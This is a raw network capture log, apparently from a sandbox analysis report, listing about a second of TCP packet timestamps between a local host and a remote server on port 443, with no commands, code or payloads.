                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.277277946 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.278379917 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.283139944 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.283155918 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.283252001 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.283260107 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.286344051 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.292720079 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.292753935 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.292829990 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.292840958 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.294286966 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.345534086 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.345571995 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.345767975 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.345767975 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.345812082 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.346220016 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.347376108 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.347393990 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.347460032 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.347470045 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.347479105 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.350339890 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353277922 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353288889 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353401899 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353408098 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353672981 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353691101 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353737116 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353744984 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353765011 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.353777885 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.354259968 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.358477116 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.358510971 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.358572006 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.358578920 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.358592033 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.358624935 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.361808062 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.361825943 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.361901999 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.361922026 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.361975908 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.368957043 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.368978977 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.369044065 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.369054079 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.369091988 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.369112968 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.377613068 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.377656937 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.377688885 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.377696991 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.377748013 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.384776115 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.384793043 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.384850979 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.384859085 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.384896994 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.392941952 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.392960072 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.393084049 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.393094063 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.393162012 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.403565884 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.403584957 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.403657913 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.403667927 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.406368971 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.420514107 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.420533895 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.420644045 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.420653105 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.420734882 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.464382887 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.464420080 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.464462996 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.464488983 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.464505911 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.466311932 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.470014095 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.470030069 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.470089912 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.470098972 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.470139980 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.470139980 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.475581884 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.475598097 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.475668907 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.475686073 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.476042986 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.485275030 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.485299110 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.485336065 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.485351086 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.485402107 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.485402107 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.538280964 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.538317919 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.538356066 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.538382053 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.538397074 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.538451910 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.540020943 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.540039062 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.540116072 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.540137053 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.540153027 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.540178061 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545310020 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545329094 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545380116 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545387983 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545416117 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545437098 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545686960 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545703888 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545773029 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545797110 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.545825958 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.546327114 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.550880909 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.550895929 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.550964117 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.550987959 CET44349699108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.553457022 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.553478003 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.553530931 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.553533077 CET49699443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.553549051 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.553559065 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.554316044 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.561619997 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.561636925 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.561708927 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.561716080 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.561758995 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.569179058 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.569196939 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.569277048 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.569283009 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.569324017 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.577356100 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.577392101 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.577433109 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.577439070 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.577476978 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.584630013 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.584654093 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.584850073 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.584856987 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.584903955 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.613092899 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.613111019 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.613178015 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.613188028 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.613250971 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.730777979 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.730818987 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.730859041 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.730885983 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.730906010 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.731101990 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.737812042 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.737829924 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.737895012 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.737929106 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.737987995 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.745958090 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.746037006 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.746253014 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.746320009 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.754112005 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.754129887 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.754230976 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.754244089 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.754287958 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.761688948 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.761709929 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.761787891 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.761795044 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.761832952 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.769833088 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.769850969 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.769920111 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.769927025 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.769978046 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.776998997 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.777014971 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.777057886 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.777062893 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.777097940 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.777159929 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.804738998 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.804780006 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.804864883 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.804864883 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.804879904 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.804925919 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.922905922 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.922933102 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.923033953 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.923059940 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.923103094 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.930552006 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.930572987 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.930668116 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.930675030 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.930816889 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.938173056 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.938189983 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.938277006 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.938283920 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.938323975 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.946192026 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.946208954 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.946305037 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.946310997 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.946353912 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.953969002 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.953994989 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.954066038 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.954072952 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.954124928 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.954143047 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.962081909 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.962106943 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.962181091 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.962187052 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.962219954 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.969362020 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.969384909 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.969446898 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.969453096 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.969487906 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.969499111 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.997271061 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.997294903 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.997395039 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.997416973 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:13.997463942 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.011084080 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.115185022 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.115207911 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.115331888 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.115356922 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.115402937 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.122982979 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.123018026 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.123111963 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.123121023 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.123167038 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.130258083 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.130275011 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.130374908 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.130381107 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.130426884 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.138505936 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.138525009 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.138607025 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.138614893 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.138648033 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.145982027 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.145998955 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.146074057 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.146080971 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.146116018 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.154194117 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.154211998 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.154289007 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.154298067 CET44349712108.181.20.35192.168.2.7
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.154328108 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.154344082 CET49712443192.168.2.7108.181.20.35
                                                                                                                                                                                                                                Dec 6, 2024 10:26:14.161240101 CET44349712108.181.20.35192.168.2.7
